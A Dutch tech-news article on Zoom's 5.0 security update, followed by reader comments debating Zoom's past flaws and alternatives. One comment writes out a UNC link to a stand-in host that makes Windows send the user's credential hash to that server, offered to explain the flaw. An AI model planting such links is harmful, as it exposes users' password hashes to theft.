Zoom kondigt update met beveiligingsfuncties aan

Zoom heeft versie 5.0 van zijn app aangekondigd, met daarin vooral veel wijzigingen aan de beveiliging van videovergaderingen. Zo heeft Zoom een beter algoritme voor versleuteling toegepast en kunnen admins instellen hoe dataverkeer wordt gerouteerd.

Zoom gebruikt straks aes 256-bits encryptie met gcm, schrijft het bedrijf. Gcm-ondersteuning zit in updates voor alle clients en vanaf 30 mei komt die voor alle accounts tegelijk beschikbaar. De verstevigde versleuteling moet betere beveiliging bieden. Ook kunnen admins na de update instellen per groep of per individu waar het dataverkeer langs gaat. Dat gaat per regio.

Daarnaast komt er een mogelijkheid voor admins om gebruikers te melden bij Zoom vanwege misbruik; die moet 'zoom-bombing' tegengaan, waarbij onbekenden in de call komen en zich misdragen. Bovendien staat Waiting Room, een wachtruimte voor gebruikers die een meeting in willen, nu standaard aan bij veel gesprekken. Ook dat moet 'zoom-bombing' tegengaan. De update is nu beschikbaar voor desktop via de site van het bedrijf.

Zoom heeft een periode van drie maanden genomen om de beveiliging en privacy van zijn dienst te verbeteren. Daar besloot het bedrijf toe nadat er binnen korte tijd veel beveilgingslekken in de dienst naar buiten kwamen.

Door Arnoud Wokke

Redacteur Tweakers

22-04-2020 • 17:32

50

Reacties (50)

50
47
27
5
0
11
Wijzig sortering
Als iemand nog twijfels heeft over het veilig gebruik van Zoom, SANS, hét toonaangevende instituut als het om opleidingen gaat in het Security vakgebied, heeft een webcast over Zoom: https://www.sans.org/webcasts/zomg-its-zoom-114670
Wij gebruiken nu nog Zoom maar binnenkort niet meer. Eigenlijk maakt het niet meer uit of ze veilig zijn of niet, de media heeft het opgevist en nu weet iedereen het. Dat Zoom nu veilig zou zijn doet er eigenlijk niet meer toe.
Het feit is immers dat als we nu webinars doen dan krijgen we telkens vragen van mogelijke deelnemers of Zoom veilig is (ook al zijn extra deelnemers voor webinars door zoom-bombing eigenlijk geen probleem en bekijken de meeste mensen onze webinars zonder de software te installeren). Dit willen wij zelf niet want wij verkopen software waarvan gebruikers verwachten dat ze veilig zijn. Als wij gebruikers sturen naar iets dat slecht in de media heeft gestaan dan stellen mensen zich vragen.
We zien het overigens ook bij onze partners (voornamelijk banken). Van hen krijgen we nu uitdrukkelijk de vraag onze webinars niet meer met Zoom te doen gezien zij het meteen geblokkeerd hebben.

Tja reputatieschade is pijnlijk voor het vertrouwen. Binnenkort is iedereen het wel vergeten, maar wij moeten wel verder en doen het dus zonder Zoom.

[Reactie gewijzigd door SMGGM op 23 juli 2024 22:05]

Ik snap het gevoeld, maar dat is ook dubbel: je vertrouwd toch ook nog steeds Microsoft ondanks alle lekken die er afgelopen jaren zijn geweest in Windows, Office etc?
Leuke vergelijking en nog niet zo'n gekke. MS heeft echter wel een track record van security problemen ernstig te nemen (als je gaat zoeken ga je er uiteraard wel altijd een paar vinden). Ze patchen hun software over het algemeen snel, hebben er duidelijke richtlijnen in en ondersteunen hun spullen een lange tijd.

Natuurlijk Windows gebruikt iedereen dus zal er veel moeten gebeuren voordat mensen dat buiten gaan gooien. Mooie vergelijking is dan Flash, jaren geplaagd door bugs en veiligheidsvraagtekens maar het heeft het toch nog lang volgehouden voordat het eindelijk verbannen was van het internet.

Ik vergelijk zoom dan (waarschijnlijk geheel onterecht) met Flash. Moest je nu nog een website tegenkomen die vraagt om Flash te installeren, zou jij dat doen?
Aan de andere kant zie ik mensen nog niet in paniek schieten als je hen een Word document doorstuurt.
Is bij ons niet anders... zeer tevreden over zoom, maar de hele tijd vragen over security en meldingen dat het gehacked is geweest en alle accounts online staan etc... onzin, het zijn gewoon mensen die hun login en wachtwoord overal hetzelfde zetten, maar de reputatie is dus om zeep.

Vraag me dan wel af: wat is jullie alternatief? De mensen willen bij ons wel meer dan 10 anderen gelijktijdig kunnen zien...
Intern gebruiken wij al Teams, het was eigenlijk enkel voor webinars dat we Zoom gebruikte. Dit zullen we nu doen met Team Live events.
Het feit dat we maar maximum 4 mensen tegelijk kunnen zien is eigenlijk door weinigen als een echte tekortkoming gezien. Veel van de mensen waarmee we praten schakelen al doelbewust de camera uit en zijn de meeste meetings rond de 4 deelnemers (dus zelden last van).
Helaas heb je wel een account nodig om de webcast te zien.
Gelukkig staat de presentatie ook op youtube :)

https://www.youtube.com/watch?v=kttInIiRVnQ
Ik begrijp de negativiteit rondom Zoom niet zo.
Ze hadden een bugje in de app, omdat je ook met facebook kon inloggen, waardoor er ook een pingeltje naar facebook ging ook al logde je daar niet via in. Handig niet, maar een heel groot issue ook niet imho. Het was ook snel opgelost.

De links naar Windows shares, dat was niet handig maar ook snel opgelost en volgens mij ook vooral een theoretisch lek, waarbij je ook kunt argumenteren dat het lek eigenlijk in Windows zit, want die stuurt zomaar een username en password naar elke (onbekende) server.

Zoombombing.. tja, de opties voor een wachtwoord en wachtkamer waren er altijd wel en staan nu standaard aan gelukkig, maar een echt lek kun je het niet noemen. Ook snel verholpen trouwens.

Dusja, het was niet heek handig allemaal, maar viel ook allemaal wel weer mee. Microsoft heeft veel ernstigere bugs en lekken in Windows en daarvan installeren we zonder morren elke dinsdag braaf de patches en er is nog geen bedrijf wat Windows heeft verboden. Of Citrix, met het grote lek van laatst.

Ik vind dat er overdreven gereageerd wordt op deze ‘lekken’ en ben juist blij dat Zoom ze snel fixt en serieus neemt.
Veel van de problemen rondom Zoom stammen uit het onjuist omgaan met het apparaat van de gebruiker. Zo was het op MacOS zo dat ze de installatie forceerde door de bestanden direct te kopiëren, waar het daar gebruikelijk is om de gebruiker de bestanden zelf naar een mapje te laten slepen. Op Windows was het zo dat Zoom om de één of andere reden Windows-wachtwoorden opsloeg, die dan weer gelekt zijn. Het lek terzijde, het is niet gebruikelijk dat software je Windows-wachtwoord opslaat, laat staan deze naar een externe server stuurt. Dan is het ook nog een tijdje zo geweest dat Zoom je zomaar in een meeting kon trekken als de software draaide, terwijl je daar als gebruiker geen feedback over kreeg en geen bevestiging hoefde te geven.

Zoom doet allemaal dingen die gewoon niet kunnen. Het blijft één van de grootste partijen in online meetings met een app die al 9 jaar bestaat, dus het is nou ook niet dat ze in hun kinderschoenen staan. Je verwacht van zo'n bedrijf dat ze de juiste procedures volgen en niet bewust dingen op een andere manier doen dan de bedoeling is binnen jouw OS.

Ik ben het ermee eens dat ze veel issues snel gefixt hebben na media-aandacht en dat een aantal van de issues veel minder erg waren dan mensen ze deden lijken (uit onwetendheid, in veel gevallen,) maar ik heb toch wel een stukje vertrouwen verloren in Zoom dat ze nooit terug gaan krijgen omdat ze hebben laten zien dat ze soms hele rare keuzes maken.
En precies dat stukje vertrouwen, daar gaat het mij om,

Als je als bedrijf bewust zaken anders gaan doen dan een OS normaal doet. Als je geen security by design doet en als je het al doet er fouten bij maakt. Dan krijg ik sterk het gevoel dat het in de kern niet op orde is.

En daardoor weiger ik elke video sessie met Zoom.
Ik heb helaas geluk dat ik nu freelance werk doe voor mijn vorige werkgever, die nog steeds trouw Zoom blijven gebruiken. Ik heb toentertijd al meerdere malen aangegeven dat er andere software is (met name Jitsi) die deze problemen niet hebben en self-hosted kunnen draaien, maar daar hadden ze geen interesse in. Nu ga ik er maar in mee, want geld is geld. Ik draai Zoom binnen Sandboxie op een laptop die ik verder weinig gebruik, maar het zou toch een stuk handiger zijn om überhaupt geen Zoom te hoeven gebruiken.
Veel van de problemen rondom Zoom stammen uit het onjuist omgaan met het apparaat van de gebruiker. Zo was het op MacOS zo dat ze de installatie forceerde door de bestanden direct te kopiëren, waar het daar gebruikelijk is om de gebruiker de bestanden zelf naar een mapje te laten slepen. Op Windows was het zo dat Zoom om de één of andere reden Windows-wachtwoorden opsloeg, die dan weer gelekt zijn. Het lek terzijde, het is niet gebruikelijk dat software je Windows-wachtwoord opslaat, laat staan deze naar een externe server stuurt.
Tja, voor wat betreft jouw eerste punt (Mac): als je de installatie van een programma opstart, dan installeert dat programma zichzelf. Sommige programma's inderdaad kun je een icoontje verslepen, maar ik ken ook zat programma's die een setup a la Windows hebben waarbij 'automatisch' de bestanden naar de applicaties-map gekopieerd worden. Of je nu twee keer op 'volgende' en 'akkoord' klikt waarna de boel geïnstalleerd wordt of een icoontje heen en weer sleept in een venster, het resultaat is toch gewoon 'een geïnstalleerd programma'. Hooguit kun je zeggen dat ze afwijken van de UI-best-practices van de Mac, denk ik dan.

Voor wat betreft je Windows-wachtwoorden, deze werden (naar mijn weten, ik hoor het graag als je een andere bron hebt) helemaal niet opgeslagen en zeer zeker niet naar een externe server gestuurd. Het probleem is, je kunt een linkje sturen a la [url="\\\\ikwiljewachtwoord.example.org\\bestand.txt"]\\ikwiljewachtwoord.example.org\bestand.txt[/url] . Als iemand daarop klikt, maakt Windows via CIFS/SMB verbinding met die server en stuurt dan de gebruikersnaam en een hash van je wachtwoord naar die server om te proberen daarmee in te loggen. Feitelijk dus het probleem in Windows dat zomaar een gehasht wachtwoord verstuurd wordt naar elke willekeurige server. Ik heb nu zo'n link hier ook op Tweakers gezet, ik weet niet of tweakers deze link wel automatisch verwijdert uit mijn bericht - zoniet, dan zit in Tweakers precies hetzelfde 'lek' als dat er in Zoom zat. Zo'n link kan dus ook op een website staan, in een e-mailtje et cetera.
Ik begrijp de negativiteit rondom Zoom niet zo.
1) Zoom heeft heel actief geprobeerd om alle mogelijke "lastige meldingen" (=beveiligingsfuncties) van het OS te omzeilen. Dit ter behoeve van de gebruikersvriendelijkheid.

Op OSX deed de installeer vanuit het pre-requirement-check al de volledige install, en misleide de gebruiker met een andere prompt om zijn wachtwoord te geven.

Op OSX draaide Zoom een webserver op localhost, waarmee de website via websockets de zoom-calls direct opende in de app. Dat allemaal zonder security. Iedere website kon dit benaderen, en ook zo het upgrade proces uitvoeren (met een willekeurige URL/binary!). Na deïnstallatie van zoom bleef deze vulnerable webserver gewoon actief. Dan kan je immers "makkelijker" zoom herinstalleren. Side-effect: je kon als hacker op OSX iedere willekeurige binary installeren, en zonder melding camera en audio afluisteren.

2) Superveilige encryptie beloven, en dat helemaal niet bieden (niet E2E, en slechts AES-128)

3) Videorecordings op publieke URLs neerzetten, die makkelijk te raden zijn.

4) Calls via china routen. Zoom servers kunnen calls decrypten.

5) Emailadressen lekken, doordat het iedereen met een @xs4all.nl of @dds.nl in een "company" map zichtbaar werd.

6) Veel mogelijkheden voor de starter van de call: stilletjes alles opnemen, naderhand prive chats inzien.

7) Je kon willekeurige emailadressen koppelen aan jouw account (email bevestigingslink gebruikte dezelfde ID als de aanmeldpagina).

8 ) Meeting ID's die makkelijk te raden zijn, en zonder wachtwoord te openen.

9) Eigen encrypte uitvinden, waardoor de call alsnog via waiting-rooms af te luisteren was.

10) Bugs met informatiecraping. Je kan doen alsof je lid bent van een organisatie, en vervolgens alle gebruikers van de organisatie uitlezen.

11) De nieuwe 5.0 release aankondigen, waarin alles nu gefixed is. Saillant detail: deze is pas over 1 week echt uit.

Dat soort dingen zijn gewoon not-done. Een foutje kan gebeuren, maar niet zo structureel als dit. Veel van deze fouten laten zien dat er niet is nagedacht over databescherming. Andere fouten ontstaan alleen als je hard je best doet om beveiligingen te omzeilen, en dus gebruikers in het gevaar te brengen. En ja, dan verdien je wel een storm van kritiek.

https://www.tomsguide.com/news/zoom-security-privacy-woes

p.s. als je echt Zoom moet gebruiken, kan dat ook veilig via hun website. Dan moet je eerst een account aanmaken, en diep in de settings opgeven dat je ook "open in browser" links wil zien op de join-pagina. Dan kan je prima in de browser een zoom-call starten.

[Reactie gewijzigd door YaPP op 23 juli 2024 22:05]

LOL.. je begint met
Ik begrijp de negativiteit rondom Zoom niet zo.
En daarna kom je zelf met drie bugs die al jaren in zatten en waar vaak genoeg over werd geklaagd. Vergeet je ook niet dat Zoom iedereen dood leuk vertelde dat elke call end-to-end ecrypted was terwijl dat helemaal niet zo was? Bleek dat ze gewoon TLS toepassen en dat als hun manier van E2E zagen.. |:(

Dus nee, zeker niet overdreven.
Ja, ik kom met 3 bugs waarvan ik uitleg dat ik die bugs eigenlijk helemaal niet zo erg vind.

Eentje (die facebook login) is slordig, ja, zeker. Maar om dat dan direct te bestempelen als groot privacy-probleem, dat gaat mij persoonlijk wat te ver.
De andere twee 'bugs' vind ik eigenlijk helemaal Zoom niet aan te rekenen, als ik heel eerlijk mag zijn. Ja, ze kunnen (en moeten en hebben dat ook gedaan) er zeker wat aan doen door die links te filteren en de standaardinstellingen op een wat veiliger niveau te zetten, maar ik vind niet dat je ze dat zwaar aan kunt rekenen.
En voor wat betreft E2E: de verbinding van jou naar Zoom is met TLS en van Zoom naar de andere mensen is TLS. Dus het is wel beveiligd en alleen bij Zoom op de server is het onversleuteld, waarschijnlijk omdat de servers dan meerdere beelden combineren in 1 stream of er nog wat extra compressie opzetten als ze het naar een deelnemer met een lagere downloadsnelheid sturen. Al het verkeer over internet is in elk geval wel versleuteld.
Mocht iemand inderdaad de Zoom-server hacken (of een kwade medewerker van Zoom), dan kunnen ze in theorie inderdaad de gesprekken meeluisteren. Maar hetzelfde geldt ook voor een willekeurige webserver of een e-mailserver.
Maar ook Jitsi heeft geen E2E encryptie momenteel, wat je kan ondervangen door het zelf te hosten. Maar ook als je zelf-gehoste server gehacked zou zijn, kan die hacker dus meeluisteren. Tja, voor staatsgeheimen is het allemaal niet goed, maar voor een normale vergadering moet het kunnen. In theorie kan iemand ook een afluisterapparaat verstoppen in je vergaderkamer als de concurrent echt je bedrijfsgeheimen wil weten. Beide hebben een hoog 'James Bond'-gehalte naar mijn mening.
TLS is geen E2E encryptie. :O

Het gaat erom dat men expliciet in de meeting liet zien 'end to end encrypted' terwijl dit technisch niet zo was. Als je zegt dat je auto een V8 motor heeft en in werkelijkheid is dit een 4cilinder dan ben je aan het misleiden, dat is geen grijs gebied.

FF lezen.
En voor wat betreft E2E: de verbinding van jou naar Zoom is met TLS en van Zoom naar de andere mensen is TLS. Dus het is wel beveiligd en alleen bij Zoom op de server is het onversleuteld, waarschijnlijk omdat de servers dan meerdere beelden combineren in 1 stream of er nog wat extra compressie opzetten als ze het naar een deelnemer met een lagere downloadsnelheid sturen. Al het verkeer over internet is in elk geval wel versleuteld.
Mocht iemand inderdaad de Zoom-server hacken (of een kwade medewerker van Zoom), dan kunnen ze in theorie inderdaad de gesprekken meeluisteren. Maar hetzelfde geldt ook voor een willekeurige webserver of een e-mailserver.
Maar ook Jitsi heeft geen E2E encryptie momenteel, wat je kan ondervangen door het zelf te hosten. Maar ook als je zelf-gehoste server gehacked zou zijn, kan die hacker dus meeluisteren. Tja, voor staatsgeheimen is het allemaal niet goed, maar voor een normale vergadering moet het kunnen. In theorie kan iemand ook een afluisterapparaat verstoppen in je vergaderkamer als de concurrent echt je bedrijfsgeheimen wil weten. Beide hebben een hoog 'James Bond'-gehalte naar mijn mening.
Toch wel fijn dat Zoom de problemen ziet bij hun applicatie en hier hard aan werkt om de applicatie te verbeteren. Zoom is erg fijne applicatie en wij maken er met ons bedrijf heel fijn gebruik van.
Zoom heeft altijd geweten hoe hun applicatie in elkaar zit. Druk van buiten af om iets aan hier te doen is niet iets waar men trots op moet zijn. Dat jullie bereid zijn een grote risico te nemen waarbij bedrijfsgeheimen kunnen worden gestolen, is iets waar je goed over moet na denken.
Natuurlijk zijn wij wel bewust als bedrijf zijnde dat er issues zijn met Zoom. Maar Zoom was voor ons het eenvoudigste op te zetten ook ivm de doelgroep van ons. Wij hebben afspraken gemaakt over het delen van bedrijfsgeheimen en persoonlijke gegevens via Zoom (als in dat doen we niet ;) ).
Ik ben benieuwd wat Zoom 'makkelijker' maakt dan een andere dienst. In principe is het altijd een geval van een link delen (al dan niet in een agenda uitnodiging) waar je dan op klikt.
Ik vind mijn gezicht anders behoorlijk persoonlijk en vallen onder de noemer 'persoonlijke gegevens', en die deel je uiteraard wel met Zoom als je Zoomt.
Die deel je met ieder vergader programma, dus dat is geen argument.
Jawel, want Zoom gaat bewezen heel slecht met je gegevens om. Bij andere is dat mogelijk niet het geval.
Het klinkt een beetje als too little too late, en het voelt nog steeds niet alsof de fundering goed is, maar ik hoop dat het Zoom lukt om nog iets te redden.
Zoom heeft de app niet uitgebracht maar alleen aangekodigd.
Nogal een wereld van verschil.
4.6.12 is gisteren uitgebracht.

Het is een goede vooruitgang!
Voorlopig staat 'ie er op hun eigen site nog niet bij, terwijl ze er zelf naar verwijzen. :?

https://zoom.us/download

Edit: zoals @Hann1BaL aangeeft, is het slechts aangekondigd.
Nog even wachten tot echt iedereen is overgestapt.
Slimme aanpak. :+

[Reactie gewijzigd door HMC op 23 juli 2024 22:05]

Dat Zoom bombing...

Als je met een groep wil video-vergaderen, zet je toch een sleutel op de deur van de vergaderzaal? Zoals bv een wachtwoord?

Ik hoorde daar intern al commentaar op. Dat werd dan weer "ingewikkeld" en niet lekker klik klik klaar...

En ja. Als je de link verstuurt aan een collega, tja dan zal daar ook wel een wachtwoord bij zitten of makkelijk door te geven zijn... Dan is die waiting room wel een goede optie.

Zakelijk is het bij ons nu verbannen, terwijl er al zat opties waren in de betaalde versie om zaken goed in het vat te gieten. Tot en met wel of niet bestanden delen en zo. Een aantal dingen mogen inderdaad wel een beetje beter gefilterd worden of standaard gewoon uit (of weg).
Ik weet dat je hier niet mag adverteren, maar ik heb dus een taxi bedrijf! Jullie mogen allemaal een gratis ritje komen maken. Ik heb nog geen gordels en ook geen rem, maar als ik ze nu aankondig, dan hoort dat geen probleem te zijn. Tot snel bij taxi zoOf!
Eh... Is de titel "Zoom kondigt update met beveiliging aan" niet beter?
Gebruiksgemak en in te stellen functies voor de host:
ZOOM: Ferrari
Teams: Opeltje
Hangouts: Fiets met twee lekke banden.

Echt, ga die shit met elkaar vergelijken en in ZOOM kan je gewoon het meest.
Zeker voor scholen zou ik gewoon ZOOM aanraden. Je kunt met gallery view gewoon alle leerlingen tegelijk in beeld hebben ipv maar een paar.
Je kunt mute all gebruiken als de boel zit te kakelen, die knop is er niet eens in Hangouts. Google zuigt.
Je kunt zelfs instellen in ZOOM dat deelnemers dan niet meer zelf kunnen unmuten. Handig voor de docenten met ordeproblemen. Spotlight video, waiting room, annotation. Chat instellen dat alleen met de host gechat mag worden. Allemaal superhandige opties die bij de concurrenten ontbreekt.

ZOOM had vooral last van Facebook 'lek'.
Nou als jij echt in de veronderstelling bent dat Facebook opeens meer van je weet als je ZOOM gaat gebruiken, heb je een bord voor je kop zo groot als de omzet van Facebook. En die is groot want de meeste mensen die zich hierover druk maken hebben geen idee dat Instagram en Whatsapp ook van Facebook zijn. Moet ik je nog herinneren aan het blauwe F'je op websites die gewoon data over jou verzamelde zonder dat je lid bent van Facebook?

Wachtwoord 'lek'. Of dat nou wel of niet ook Microsofts fout is. Als een hacker eenmaal fysiek achter je pc zit kan hij op allerlei manieren naar binnen. Daar hoeft hij echt ZOOM niet voor te gebruiken.

Xs4all lek.
Ja, die was erg dom. ZOOM heeft direct alle 'company contacts' uit gezet. Alleen als je betalende klant bent denk ik dat je dat nog aan kan zetten.

ZOOMbombing.
Tsja... Als mensen de link forwarden naar anderen, krijg je onbekende gebruikers in je meeting.
In zoom kan je tenminste wel deze verplicht stil laten zijn en uitzetten dat deze mensen ook dingen kunnen delen (Powerpoint of juist minder prettige zaken).
Dat iedereen kan sharen kan je bij Teams en bij Hangouts niet uitzetten.
Wat is dan beter?

Op dit item kan niet meer gereageerd worden.